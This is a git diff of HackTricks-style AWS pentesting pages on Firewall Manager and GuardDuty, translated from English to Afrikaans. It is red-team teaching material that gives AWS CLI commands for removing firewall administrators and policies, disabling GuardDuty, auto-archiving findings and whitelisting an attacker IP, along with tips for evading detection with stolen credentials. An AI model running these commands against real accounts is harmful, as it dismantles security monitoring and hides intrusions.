-- To conclude, the AWS Organizations management account must designate the Firewall Manager dafault administrator.
+- Eerstens, elke Firewall Administrator administrateurrekening moet hul eie rekening herroep.
+- Dan kan die bestaande standaard administrateur hul eie rekening herroep, wat effektief die organisasie van Firewall Manager afmeld. Hierdie proses lei tot die verwydering van alle Firewall Manager-beleide wat deur die herroepte rekening geskep is.
+- Om af te sluit, moet die AWS Organizations bestuurrekening die Firewall Manager standaard administrateur aanwys.
 
 ## Enumeration
-
 ```
 # Users/Administrators
 
@@ -162,66 +161,58 @@ aws fms get-third-party-firewall-association-status --third-party-firewall <PALO
 ## Get violations' details for a resource based on the specified AWS Firewall Manager policy and AWS account.
 aws fms get-violation-details --policy-id <value> --member-account <value> --resource-id <value> --resource-type <value>
 ```
-
 ## Post Exploitation / Bypass Detection
 
 ### `organizations:DescribeOrganization` & (`fms:AssociateAdminAccount`, `fms:DisassociateAdminAccount`, `fms:PutAdminAccount`)
 
-An attacker with the **`fms:AssociateAdminAccount`** permission would be able to set the Firewall Manager default administrator account. With the **`fms:PutAdminAccount`** permission, an attacker would be able to create or updatea Firewall Manager administrator account and with the **`fms:DisassociateAdminAccount`** permission, a potential attacker could remove the current Firewall Manager administrator account association.
-
-- The disassociation of the **Firewall Manager default administrator follows the first-in-last-out policy**. All the Firewall Manager administrators must disassociate before the Firewall Manager default administrator can disassociate the account.
-- In order to create a Firewall Manager administrator by **PutAdminAccount**, the account must belong to the organization that was previously onboarded to Firewall Manager using **AssociateAdminAccount**.
-- The creation of a Firewall Manager administrator account can only be done by the organization's management account.
+'n Aanvaller met die **`fms:AssociateAdminAccount`** toestemming sal in staat wees om die Firewall Manager standaard administrateur rekening in te stel. Met die **`fms:PutAdminAccount`** toestemming, sal 'n aanvaller in staat wees om 'n Firewall Manager administrateur rekening te skep of op te dateer en met die **`fms:DisassociateAdminAccount`** toestemming, kan 'n potensiële aanvaller die huidige Firewall Manager administrateur rekening assosiasie verwyder.
 
+- Die disassosiasie van die **Firewall Manager standaard administrateur volg die eerste-in-laatste-uit beleid**. Alle Firewall Manager administrateurs moet disassosieer voordat die Firewall Manager standaard administrateur die rekening kan disassosieer.
+- Ten einde 'n Firewall Manager administrateur te skep deur **PutAdminAccount**, moet die rekening aan die organisasie behoort wat voorheen by Firewall Manager geregistreer is met behulp van **AssociateAdminAccount**.
+- Die skepping van 'n Firewall Manager administrateur rekening kan slegs deur die organisasie se bestuursrekening gedoen word.
 ```bash
 aws fms associate-admin-account --admin-account <value>
 aws fms disassociate-admin-account
 aws fms put-admin-account --admin-account <value>
 ```
-
-**Potential Impact:** Loss of centralized management, policy evasion, compliance violations, and disruption of security controls within the environment.
+**Potensiële Impak:** Verlies van gesentraliseerde bestuur, beleidsontduiking, nakomingsoortredings, en ontwrigting van sekuriteitsbeheer binne die omgewing.
 
 ### `fms:PutPolicy`, `fms:DeletePolicy`
 
-An attacker with the **`fms:PutPolicy`**, **`fms:DeletePolicy`** permissions would be able to create, modify or permanently delete an AWS Firewall Manager policy.
-
+'n Aanvaller met die **`fms:PutPolicy`**, **`fms:DeletePolicy`** toestemmings sal in staat wees om 'n AWS Firewall Manager-beleid te skep, te wysig of permanent te verwyder.
 ```bash
 aws fms put-policy --policy <value> | --cli-input-json file://<policy.json> [--tag-list <value>]
 aws fms delete-policy --policy-id <value> [--delete-all-policy-resources | --no-delete-all-policy-resources]
 ```
-
-An example of permisive policy through permisive security group, in order to bypass the detection, could be the following one:
-
+'n Voorbeeld van 'n toelaatbare beleid deur 'n toelaatbare sekuriteitsgroep, ten einde die opsporing te omseil, kan die volgende wees:
 ```json
 {
-  "Policy": {
-    "PolicyName": "permisive_policy",
-    "SecurityServicePolicyData": {
-      "Type": "SECURITY_GROUPS_COMMON",
-      "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"<permisive_security_group_id>\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}"
-    },
-    "ResourceTypeList": [
-      "AWS::EC2::Instance",
-      "AWS::EC2::NetworkInterface",
-      "AWS::EC2::SecurityGroup",
-      "AWS::ElasticLoadBalancingV2::LoadBalancer",
-      "AWS::ElasticLoadBalancing::LoadBalancer"
-    ],
-    "ResourceType": "AWS::EC2::SecurityGroup",
-    "ExcludeResourceTags": false,
-    "ResourceTags": [],
-    "RemediationEnabled": true
-  },
-  "TagList": []
+"Policy": {
+"PolicyName": "permisive_policy",
+"SecurityServicePolicyData": {
+"Type": "SECURITY_GROUPS_COMMON",
+"ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"<permisive_security_group_id>\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}"
+},
+"ResourceTypeList": [
+"AWS::EC2::Instance",
+"AWS::EC2::NetworkInterface",
+"AWS::EC2::SecurityGroup",
+"AWS::ElasticLoadBalancingV2::LoadBalancer",
+"AWS::ElasticLoadBalancing::LoadBalancer"
+],
+"ResourceType": "AWS::EC2::SecurityGroup",
+"ExcludeResourceTags": false,
+"ResourceTags": [],
+"RemediationEnabled": true
+},
+"TagList": []
 }
 ```
-
-**Potential Impact:** Dismantling of security controls, policy evasion, compliance violations, operational disruptions, and potential data breaches within the environment.
+**Potensiële Impak:** Ontmanteling van sekuriteitsbeheer, beleidsontduiking, nakomingsoortredings, operasionele onderbrekings, en potensiële datalekke binne die omgewing.
 
 ### `fms:BatchAssociateResource`, `fms:BatchDisassociateResource`, `fms:PutResourceSet`, `fms:DeleteResourceSet`
 
-An attacker with the **`fms:BatchAssociateResource`** and **`fms:BatchDisassociateResource`** permissions would be able to associate or disassociate resources from a Firewall Manager resource set respectively. In addition, the **`fms:PutResourceSet`** and **`fms:DeleteResourceSet`** permissions would allow an attacker to create, modify or delete these resource sets from AWS Firewall Manager.
-
+'n Aanvaller met die **`fms:BatchAssociateResource`** en **`fms:BatchDisassociateResource`** toestemmings sal in staat wees om hulpbronne van 'n Firewall Manager hulpbronstel te assosieer of te disassosieer. Daarbenewens sal die **`fms:PutResourceSet`** en **`fms:DeleteResourceSet`** toestemmings 'n aanvaller in staat stel om hierdie hulpbronstelle van AWS Firewall Manager te skep, te wysig of te verwyder.
 ```bash
 # Associate/Disassociate resources from a resource set
 aws fms batch-associate-resource --resource-set-identifier <value> --items <value>
@@ -231,83 +222,68 @@ aws fms batch-disassociate-resource --resource-set-identifier <value> --items <v
 aws fms put-resource-set --resource-set <value> [--tag-list <value>]
 aws fms delete-resource-set --identifier <value>
 ```
-
-**Potential Impact:** The addition of an unnecessary amount of items to a resource set will increase the level of noise in the Service potentially causing a DoS. In addition, changes of the resource sets could lead to a resource disruption, policy evasion, compliance violations, and disruption of security controls within the environment.
+**Potensiële Impak:** Die toevoeging van 'n onnodige hoeveelheid items aan 'n hulpbronstel sal die vlak van geraas in die Diens verhoog, wat moontlik 'n DoS kan veroorsaak. Daarbenewens kan veranderinge aan die hulpbronstelle lei tot 'n hulpbrononderbreking, beleidsontduiking, nakomingsoortredings, en onderbreking van sekuriteitsbeheer binne die omgewing.
 
 ### `fms:PutAppsList`, `fms:DeleteAppsList`
 
-An attacker with the **`fms:PutAppsList`** and **`fms:DeleteAppsList`** permissions would be able to create, modify or delete application lists from AWS Firewall Manager. This could be critical, as unauthorized applications could be allowed access to the general public, or access to authorized applications could be denied, causing a DoS.
-
+'n Aanvaller met die **`fms:PutAppsList`** en **`fms:DeleteAppsList`** toestemmings sal in staat wees om toepassingslyste van AWS Firewall Manager te skep, te wysig of te verwyder. Dit kan krities wees, aangesien nie-geautoriseerde toepassings toegang tot die algemene publiek mag kry, of toegang tot geautoriseerde toepassings mag ontken word, wat 'n DoS kan veroorsaak.
 ```bash
 aws fms put-apps-list --apps-list <value> [--tag-list <value>]
 aws fms delete-apps-list --list-id <value>
 ```
-
-**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment.
+**Potensiële Impak:** Dit kan lei tot verkeerde konfigurasies, beleidsontduiking, nakomingsoortredings, en onderbreking van sekuriteitsbeheer binne die omgewing.
 
 ### `fms:PutProtocolsList`, `fms:DeleteProtocolsList`
 
-An attacker with the **`fms:PutProtocolsList`** and **`fms:DeleteProtocolsList`** permissions would be able to create, modify or delete protocols lists from AWS Firewall Manager. Similarly as with applications lists, this could be critical since unauthorized protocols could be used by the general public, or the use of authorized protocols could be denied, causing a DoS.
-
+'n Aanvaller met die **`fms:PutProtocolsList`** en **`fms:DeleteProtocolsList`** toestemmings sal in staat wees om protokollys te skep, te wysig of te verwyder vanaf AWS Firewall Manager. Net soos met toepassingslyste, kan dit krities wees aangesien ongeoorloofde protokolle deur die algemene publiek gebruik kan word, of die gebruik van geoorloofde protokolle kan ontken word, wat 'n DoS kan veroorsaak.
 ```bash
 aws fms put-protocols-list --apps-list <value> [--tag-list <value>]
 aws fms delete-protocols-list --list-id <value>
 ```
-
-**Potential Impact:** This could result in misconfigurations, policy evasion, compliance violations, and disruption of security controls within the environment.
+**Potensiële Impak:** Dit kan lei tot verkeerde konfigurasies, beleidsontduiking, nakomingsoortredings, en onderbreking van sekuriteitsbeheer binne die omgewing.
 
 ### `fms:PutNotificationChannel`, `fms:DeleteNotificationChannel`
 
-An attacker with the **`fms:PutNotificationChannel`** and **`fms:DeleteNotificationChannel`** permissions would be able to delete and designate the IAM role and Amazon Simple Notification Service (SNS) topic that Firewall Manager uses to record SNS logs.
+'n Aanvaller met die **`fms:PutNotificationChannel`** en **`fms:DeleteNotificationChannel`** toestemmings sal in staat wees om die IAM-rol en Amazon Simple Notification Service (SNS) onderwerp wat Firewall Manager gebruik om SNS-logs te registreer, te verwyder en aan te dui.
 
-To use **`fms:PutNotificationChannel`** outside of the console, you need to set up the SNS topic's access policy, allowing the specified **SnsRoleName** to publish SNS logs. If the provided **SnsRoleName** is a role other than the **`AWSServiceRoleForFMS`**, it requires a trust relationship configured to permit the Firewall Manager service principal **fms.amazonaws.com** to assume this role.
+Om **`fms:PutNotificationChannel`** buite die konsole te gebruik, moet jy die SNS-onderwerp se toegangbeleid opstel, wat die gespesifiseerde **SnsRoleName** toelaat om SNS-logs te publiseer. As die verskafde **SnsRoleName** 'n rol anders as die **`AWSServiceRoleForFMS`** is, vereis dit 'n vertrouensverhouding wat geconfigureer is om die Firewall Manager dienshoof **fms.amazonaws.com** toe te laat om hierdie rol aan te neem.
 
-For information about configuring an SNS access policy:
+Vir inligting oor die konfigurasie van 'n SNS-toegangbeleid:
 
 {{#ref}}
 ../aws-sns-enum.md
 {{#endref}}
-
 ```bash
 aws fms put-notification-channel --sns-topic-arn <value> --sns-role-name <value>
 aws fms delete-notification-channel
 ```
-
-**Potential Impact:** This would potentially lead to miss security alerts, delayed incident response, potential data breaches and operational disruptions within the environment.
+**Potensiële Impak:** Dit kan potensieel lei tot gemiste sekuriteitswaarskuwings, vertraagde insidentrespons, potensiële datalekke en operasionele ontwrigtings binne die omgewing.
 
 ### `fms:AssociateThirdPartyFirewall`, `fms:DisssociateThirdPartyFirewall`
 
-An attacker with the **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager.
+'n Aanvaller met die **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** toestemmings sal in staat wees om derdeparty-vuurmure te assosieer of te dissosieer van sentrale bestuur deur AWS Firewall Manager.
 
 > [!WARNING]
-> Only the default administrator can create and manage third-party firewalls.
-
+> Slegs die standaard administrateur kan derdeparty-vuurmure skep en bestuur.
 ```bash
 aws fms associate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL]
 aws fms disassociate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL]
 ```
-
-**Potential Impact:** The disassociation would lead to a policy evasion, compliance violations, and disruption of security controls within the environment. The association on the other hand would lead to a disruption of cost and budget allocation.
+**Potensiële Impak:** Die dissosiasie sou lei tot 'n beleidsontduiking, nakomingsoortredings, en ontwrigting van sekuriteitsbeheer binne die omgewing. Die assosiasie aan die ander kant sou lei tot 'n ontwrigting van koste- en begrotingstoewysing.
 
 ### `fms:TagResource`, `fms:UntagResource`
 
-An attacker would be able to add, modify, or remove tags from Firewall Manager resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+'n Aanvaller sou in staat wees om etikette by Firewall Manager hulpbronne te voeg, te wysig of te verwyder, wat jou organisasie se koste-toewysing, hulpbronopsporing, en toegangbeheerbeleide gebaseer op etikette ontwrig.
 ```bash
 aws fms tag-resource --resource-arn <value> --tag-list <value>
 aws fms untag-resource --resource-arn <value> --tag-keys <value>
 ```
+**Potensiële Impak**: Ontwrichting van koste-toewysing, hulpbronopsporing, en etiket-gebaseerde toegangbeheerbeleide.
 
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
-
-## References
+## Verwysings
 
 - [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html)
 - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html)
 - [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
index 2794852d3..c06141262 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
@@ -4,64 +4,63 @@
 
 ## GuardDuty
 
-According to the [**docs**](https://aws.amazon.com/guardduty/features/): GuardDuty combines **machine learning, anomaly detection, network monitoring, and malicious file discovery**, using both AWS and industry-leading third-party sources to help protect workloads and data on AWS. GuardDuty is capable of analysing tens of billions of events across multiple AWS data sources, such as AWS CloudTrail event logs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) audit and system-level logs, and DNS query logs.
+Volgens die [**docs**](https://aws.amazon.com/guardduty/features/): GuardDuty kombineer **masjienleer, anomaliedetektering, netwerkmonitering, en kwaadwillige lêerontdekking**, met behulp van beide AWS en toonaangewende derdepartybronne om te help om werklading en data op AWS te beskerm. GuardDuty is in staat om tien biljoene gebeurtenisse oor verskeie AWS-databronne te analiseer, soos AWS CloudTrail gebeurtenislogs, Amazon Virtual Private Cloud (VPC) Flow Logs, Amazon Elastic Kubernetes Service (EKS) oudit- en stelselniveau logs, en DNS-vraaglogs.
 
-Amazon GuardDuty **identifies unusual activity within your accounts**, analyses the **security relevanc**e of the activity, and gives the **context** in which it was invoked. This allows a responder to determine if they should spend time on further investigation.
+Amazon GuardDuty **identifiseer ongewone aktiwiteit binne jou rekeninge**, analiseer die **veiligheidsrelevansie** van die aktiwiteit, en gee die **konteks** waarin dit geaktiveer is. Dit stel 'n responder in staat om te bepaal of hulle tyd moet spandeer aan verdere ondersoek.
 
-Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events.
+Waarskuwings **verskyn in die GuardDuty-konsol (90 dae)** en CloudWatch Events.
 
 > [!WARNING]
-> When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\
-> If you just stop it, the existing findings will remain.
+> Wanneer 'n gebruiker **GuardDuty deaktiveer**, sal dit ophou om jou AWS-omgewing te monitor en dit sal glad nie nuwe bevindings genereer nie, en die **bestaande bevindings sal verlore gaan**.\
+> As jy dit net stop, sal die bestaande bevindings bly.
 
-### Findings Example
+### Bevindinge Voorbeeld
 
-- **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP.
-- **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS.
-- **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses.
-- **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets.
+- **Verkenning**: Aktiwiteit wat verkenning deur 'n aanvaller aandui, soos **ongewone API-aktiwiteit**, verdagte databasis **aanmeld** pogings, intra-VPC **poortskandering**, ongewone mislukte aanmeldversoekpatrone, of onbelemmerde poortprobering vanaf 'n bekende slegte IP.
+- **Instansie-kompromie**: Aktiwiteit wat 'n instansie-kompromie aandui, soos **kripto-geldeenheid mynbou, agterdeur opdrag en beheer (C\&C)** aktiwiteit, malware wat domein generasie algoritmes (DGA) gebruik, uitgaande ontkenning van diens aktiwiteit, ongewone **hoë netwerk** verkeersvolume, ongewone netwerkprotokolle, uitgaande instansiekommunikasie met 'n bekende kwaadwillige IP, tydelike Amazon EC2 geloofsbriewe wat deur 'n eksterne IP-adres gebruik word, en data eksfiltrasie met behulp van DNS.
+- **Rekening-kompromie**: Algemene patrone wat dui op rekening-kompromie sluit API-oproepe vanaf 'n ongewone geolokasie of anonymiserende proxy in, pogings om AWS CloudTrail logging te deaktiveer, veranderinge wat die rekening wagwoordbeleid verzwak, ongewone instansie of infrastruktuur bekendstellings, infrastruktuurontplooiings in 'n ongewone streek, geloofsbriewe-diefstal, verdagte databasis aanmeldaktiwiteit, en API-oproepe vanaf bekende kwaadwillige IP-adresse.
+- **Emmer-kompromie**: Aktiwiteit wat 'n emmer-kompromie aandui, soos verdagte data-toegangspatrone wat geloofsbriefmisbruik aandui, ongewone Amazon S3 API-aktiwiteit vanaf 'n afgeleë gasheer, ongeoorloofde S3-toegang vanaf bekende kwaadwillige IP-adresse, en API-oproepe om data in S3-emmers te verkry vanaf 'n gebruiker met geen vorige geskiedenis van toegang tot die emmer of geaktiveer vanaf 'n ongewone ligging. Amazon GuardDuty monitor en analiseer voortdurend AWS CloudTrail S3 data gebeurtenisse (bv. GetObject, ListObjects, DeleteObject) om verdagte aktiwiteit oor al jou Amazon S3-emmers te detecteer.
 
 <details>
 
-<summary>Finding Information</summary>
+<summary>Bevinding Inligting</summary>
 
-Finding summary:
+Bevinding opsomming:
 
-- Finding type
-- Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low
-- Region
-- Account ID
-- Resource ID
-- Time of detection
-- Which threat list was used
+- Bevinding tipe
+- Ernstigheid: 7-8.9 Hoog, 4-6.9 Medium, 01-3.9 Laag
+- Streek
+- Rekening ID
+- Hulpbron ID
+- Tyd van opsporing
+- Watter bedreigingslys is gebruik
 
-The body has this information:
+Die liggaam het hierdie inligting:
 
-- Resource affected
-- Action
-- Actor: Ip address, port and domain
-- Additional Information
+- Hulpbron geraak
+- Aksie
+- Akteur: IP-adres, poort en domein
+- Bykomende Inligting
 
 </details>
 
-### All Findings
+### Alle Bevindinge
 
-Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
+Toegang tot 'n lys van al die GuardDuty bevindinge in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
 
-### Multi Accounts
+### Multi Rekeninge
 
-#### By Invitation
+#### Deur Uitnodiging
 
-You can **invite other accounts** to a different AWS GuardDuty account so **every account is monitored from the same GuardDuty**. The master account must invite the member accounts and then the representative of the member account must accept the invitation.
+Jy kan **ander rekeninge uitnooi** na 'n ander AWS GuardDuty rekening sodat **elke rekening vanaf dieselfde GuardDuty gemonitor word**. Die meesterrekening moet die lidrekeninge uitnooi en dan moet die verteenwoordiger van die lidrekening die uitnodiging aanvaar.
 
-#### Via Organization
+#### Via Organisasie
 
-You can designate any account within the organization to be the **GuardDuty delegated administrator**. Only the organization management account can designate a delegated administrator.
+Jy kan enige rekening binne die organisasie aanwys om die **GuardDuty gedelegeerde administrateur** te wees. Slegs die organisasie bestuurrekening kan 'n gedelegeerde administrateur aanwys.
 
-An account that gets designated as a delegated administrator becomes a GuardDuty administrator account, has GuardDuty enabled automatically in the designated AWS Region, and also has the **permission to enable and manage GuardDuty for all of the accounts in the organization within that Region**. The other accounts in the organization can be viewed and added as GuardDuty member accounts associated with this delegated administrator account.
-
-## Enumeration
+'n Rekening wat as 'n gedelegeerde administrateur aangewys word, word 'n GuardDuty administrateurrekening, het GuardDuty outomaties geaktiveer in die aangewese AWS Streek, en het ook die **toestemming om GuardDuty in te skakel en te bestuur vir al die rekeninge in die organisasie binne daardie Streek**. Die ander rekeninge in die organisasie kan gesien en bygevoeg word as GuardDuty lidrekeninge wat met hierdie gedelegeerde administrateurrekening geassosieer word.
 
+## Enumerasie
 ```bash
 # Get Org config
 aws guardduty list-organization-admin-accounts #Get Delegated Administrator
@@ -101,85 +100,76 @@ aws guardduty list-publishing-destinations --detector-id <id>
 aws guardduty list-threat-intel-sets --detector-id <id>
 aws guardduty get-threat-intel-set --detector-id <id> --threat-intel-set-id <id>
 ```
-
 ## GuardDuty Bypass
 
-### General Guidance
+### Algemene Riglyne
 
-Try to find out as much as possible about the behaviour of the credentials you are going to use:
+Probeer soveel as moontlik uit te vind oor die gedrag van die kredensiale wat jy gaan gebruik:
 
-- Times it's used
-- Locations
-- User Agents / Services (It could be used from awscli, webconsole, lambda...)
-- Permissions regularly used
+- Tye wat dit gebruik word
+- Ligginge
+- Gebruikersagente / Dienste (Dit kan gebruik word vanaf awscli, webconsole, lambda...)
+- Toestemmings wat gereeld gebruik word
 
-With this information, recreate as much as possible the same scenario to use the access:
+Met hierdie inligting, herleef soveel as moontlik dieselfde scenario om die toegang te gebruik:
 
-- If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible)
-- If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges
-- Always try to use the **same permissions** this principal has used
-- If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one)
+- As dit 'n **gebruiker of 'n rol is wat deur 'n gebruiker toeganklik is**, probeer om dit in dieselfde ure te gebruik, vanaf dieselfde geolokasie (selfs dieselfde ISP en IP indien moontlik)
+- As dit 'n **rol is wat deur 'n diens gebruik word**, skep dieselfde diens in dieselfde streek en gebruik dit van daar in dieselfde tydsbereik
+- Probeer altyd om die **dieselfde toestemmings** te gebruik wat hierdie prinsiep gebruik het
+- As jy **ander toestemmings moet gebruik of 'n toestemming moet misbruik** (byvoorbeeld, aflaai van 1.000.000 cloudtrail log lêers) doen dit **stadig** en met die **minimale hoeveelheid interaksies** met AWS (awscli roep soms verskeie lees API's aan voordat die skryf een) 
 
-### Breaking GuardDuty
+### Breek GuardDuty
 
 #### `guardduty:UpdateDetector`
 
-With this permission you could disable GuardDuty to avoid triggering alerts.
-
+Met hierdie toestemming kan jy GuardDuty deaktiveer om te verhoed dat waarskuwings geaktiveer word.
 ```bash
 aws guardduty update-detector --detector-id <detector-id> --no-enable
 aws guardduty update-detector --detector-id <detector-id> --data-sources S3Logs={Enable=false}
 ```
-
 #### `guardduty:CreateFilter`
 
-Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings:
-
+Aanvallers met hierdie toestemming het die vermoë om **filters te gebruik vir die outomatiese** argivering van bevindings:
 ```bash
 aws guardduty create-filter  --detector-id <detector-id> --name <filter-name> --finding-criteria file:///tmp/criteria.json --action ARCHIVE
 ```
-
 #### `iam:PutRolePolicy`, (`guardduty:CreateIPSet`|`guardduty:UpdateIPSet`)
 
-Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address to it and avoid generating alerts.
-
+Aanvallers met die vorige voorregte kon GuardDuty se [**Vertroude IP lys**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) wysig deur hul IP adres daaraan toe te voeg en sodoende die generering van waarskuwings te vermy.
 ```bash
 aws guardduty update-ip-set --detector-id <detector-id> --activate --ip-set-id <ip-set-id> --location https://some-bucket.s3-eu-west-1.amazonaws.com/attacker.csv
 ```
-
 #### `guardduty:DeletePublishingDestination`
 
-Attackers could remove the destination to prevent alerting:
-
+Aanvallers kan die bestemming verwyder om waarskuwings te voorkom:
 ```bash
 aws guardduty delete-publishing-destination --detector-id <detector-id> --destination-id <dest-id>
 ```
-
 > [!CAUTION]
-> Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings.
+> Die verwydering van hierdie publikasiebestemming sal **nie die generasie of sigbaarheid van bevindings binne die GuardDuty-konsol beïnvloed nie**. GuardDuty sal voortgaan om gebeurtenisse in jou AWS-omgewing te analiseer, verdagte of onverwagte gedrag te identifiseer, en bevindings te genereer.
 
-### Specific Findings Bypass Examples
+### Spesifieke Bevinding Bypass Voorbeelde
 
-Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught.
+Let daarop dat daar tientalle GuardDuty bevindings is, egter, **as 'n Red Teamer sal nie almal jou beïnvloed nie**, en wat beter is, jy het die **volledige dokumentasie van elk van hulle** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so kyk na hulle voordat jy enige aksie onderneem om nie gevang te word nie.
 
-Here you have a couple of examples of specific GuardDuty findings bypasses:
+Hier is 'n paar voorbeelde van spesifieke GuardDuty bevindinge bypasses:
 
 #### [PenTest:IAMUser/KaliLinux](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux) <a href="#pentest-iam-kalilinux" id="pentest-iam-kalilinux"></a>
 
-GuardDuty detect AWS API requests from common penetration testing tools and trigger a [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\
-It's detected by the **user agent name** that is passed in the API request.\
-Therefore, **modifying the user agent** it's possible to prevent GuardDuty from detecting the attack.
+GuardDuty detect AWS API versoeke van algemene penetrasietoets gereedskap en aktiveer 'n [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\
+Dit word opgespoor deur die **gebruikersagentnaam** wat in die API versoek oorgedra word.\
+Daarom, **om die gebruikersagent te wysig** is dit moontlik om GuardDuty te verhoed om die aanval te detecteer.
 
-To prevent this you can search from the script `session.py` in the `botocore` package and modify the user agent, or set Burp Suite as the AWS CLI proxy and change the user-agent with the MitM or just use an OS like Ubuntu, Mac or Windows will prevent this alert from triggering.
+Om dit te voorkom kan jy soek vanaf die skrip `session.py` in die `botocore` pakket en die gebruikersagent wysig, of Burp Suite as die AWS CLI proxy stel en die gebruikersagent met die MitM verander of net 'n OS soos Ubuntu, Mac of Windows gebruik sal voorkom dat hierdie waarskuwing geaktiveer word.
 
 #### UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration
 
-Extracting EC2 credentials from the metadata service and **utilizing them outside** the AWS environment activates the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) alert. Conversely, employing these credentials from your EC2 instance triggers the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) alert. Yet, **using the credentials on another compromised EC2 instance within the same account goes undetected**, raising no alert.
